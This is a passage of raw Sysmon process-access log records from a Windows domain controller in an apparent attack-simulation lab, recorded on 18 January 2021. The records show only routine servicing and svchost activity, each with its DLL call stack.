b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.383{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.383{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4
.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.367{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.367{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
